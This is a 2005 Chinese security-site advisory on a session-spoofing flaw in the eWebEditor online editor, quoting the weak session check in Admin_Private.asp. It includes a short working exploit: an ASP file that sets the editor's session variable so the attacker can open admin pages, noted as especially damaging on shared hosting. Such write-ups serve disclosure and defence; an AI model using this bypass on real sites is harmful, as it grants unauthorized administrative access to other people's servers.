网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > 漏洞分析 > eWebEditor session欺骗漏洞  

eWebEditor session欺骗漏洞

2005-12-05  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp

漏洞影响:虚拟主机的克星.

TAGs   漏洞   欺骗   访问   判断   h4x0r.asp   If   eWebEditor_User      
 上一篇:NOWA simple gallery存在遍历目录漏洞(图)   下一篇:eWebEditor session欺骗漏洞
相关文章列表
eWebEditor session欺骗漏洞 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.关于net.exe跟net1.exe的关系
2.phpwind漏洞利用终结篇
3.动网论坛权限提升漏洞(图)
4.迅雷再爆高危0Day漏洞
5.又见ARP攻击会话劫持挂马的黑客程序
6.phpwind blog漏洞分析与攻击过程(图)
7.Linksys WRT54G无线路由器多个远程安全漏
8.关于IE执行任意程序漏洞的深入分析
9.2007.7.12最新免费刷QB
10.老兵新传-各种漏洞的利用和一些搜索参数
最新推荐文章:
1.HP-UX get_system_info的工具非授权更改
2.SIDVault Simple_Bind 函数多个远程溢出
3.Sun Java系统应用服务器管理控制台漏洞
4.Windows Vista系统十大漏洞预警
5.3Proxy FTP代理模块OPEN命令双重释放漏洞
6.又见ARP攻击会话劫持挂马的黑客程序
7.动网论坛刷分刷经验漏洞(图)
8.eWebEditor session欺骗漏洞
9.ASP注入漏洞全接触(最全的)
10.新思路现动网新漏洞
网管论坛交流:
·不疯魔不成活
·令你大开眼界的真正标准化机房,已整理重
·为赈灾,女孩舍身拍“裸照”
·Windows Server 2003服务器群集创建和配
·exchange2k3全套官方资料
·双儿一周岁了。。。特殊的礼物来啦。。
·存储备份技术版块守则
·无盘技术交流区守则
·DOS命令基础大全之命令详解<作者吐血
·Windows XP 操作系统默认设置需要注意的